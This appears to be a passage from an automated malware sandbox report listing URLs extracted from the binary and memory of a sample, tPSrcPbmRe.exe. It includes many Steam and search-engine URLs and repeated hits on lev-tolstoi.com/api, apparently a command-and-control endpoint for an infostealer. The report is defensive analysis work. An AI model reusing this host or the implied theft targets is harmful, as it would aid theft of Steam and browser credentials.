                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: tPSrcPbmRe.exe, 00000000.00000003.2269408398.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: tPSrcPbmRe.exe, 00000000.00000003.2269408398.0000000005AF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: tPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2223120012.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: tPSrcPbmRe.exe, 00000000.00000003.2293272842.0000000005AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: tPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: tPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=e
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: tPSrcPbmRe.exe, 00000000.00000003.2293272842.0000000005AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                Source: tPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: tPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: tPSrcPbmRe.exe, 00000000.00000003.2221974377.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221810075.0000000005B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2223120012.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198601582.0000000001340000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001336000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2293272842.0000000005AD5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: tPSrcPbmRe.exe, tPSrcPbmRe.exe, 00000000.00000003.2267311649.0000000005AD5000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2320307864.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2245471516.000000000135C000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2268779813.0000000005AD6000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198657134.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2220955202.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2369256724.0000000005AD1000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2320254445.0000000005AD5000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2293272842.0000000005AD5000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2245238274.0000000001354000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000002.2378751257.0000000005AD6000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2245414561.0000000001354000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2220817144.000000000133A000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2198759288.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2293140651.00000000012EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: tPSrcPbmRe.exe, 00000000.00000002.2377002468.00000000012EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/2U
                Source: tPSrcPbmRe.exe, 00000000.00000002.2378751257.0000000005ADF000.00000004.00000800.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2369256724.0000000005ADF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/I
                Source: tPSrcPbmRe.exe, 00000000.00000003.2198657134.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000002.2377002468.00000000012EE000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2320110166.00000000012C6000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000002.2377038945.0000000001354000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2298375362.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2336933688.000000000133D000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2369474716.0000000001354000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2336790976.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2336790976.0000000001354000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2293140651.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2297990501.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: tPSrcPbmRe.exe, 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api(
                Source: tPSrcPbmRe.exe, 00000000.00000002.2377038945.0000000001354000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2369474716.0000000001354000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2336790976.0000000001354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api)
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245238274.0000000001331000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiBy
                Source: tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apic
                Source: tPSrcPbmRe.exe, 00000000.00000003.2320110166.00000000012C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apire
                Source: tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apiy
                Source: tPSrcPbmRe.exe, 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/d
                Source: tPSrcPbmRe.exe, 00000000.00000002.2377002468.00000000012EE000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: tPSrcPbmRe.exe, 00000000.00000003.2320307864.00000000012F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/piH
                Source: tPSrcPbmRe.exe, 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/piP
                Source: tPSrcPbmRe.exe, 00000000.00000003.2320307864.00000000012F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/s
                Source: tPSrcPbmRe.exe, 00000000.00000003.2267092336.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2271074155.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2293140651.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2297990501.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                Source: tPSrcPbmRe.exe, 00000000.00000003.2245238274.0000000001331000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api8
                Source: tPSrcPbmRe.exe, 00000000.00000002.2377038945.000000000133F000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2336933688.000000000133D000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2336790976.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2375660843.000000000133F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/apiWdtPWdtP
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2223120012.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2223120012.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: tPSrcPbmRe.exe, 00000000.00000003.2177424761.0000000001330000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2221021952.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, tPSrcPbmRe.exe, 00000000.00000003.2223120012.000000000132F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
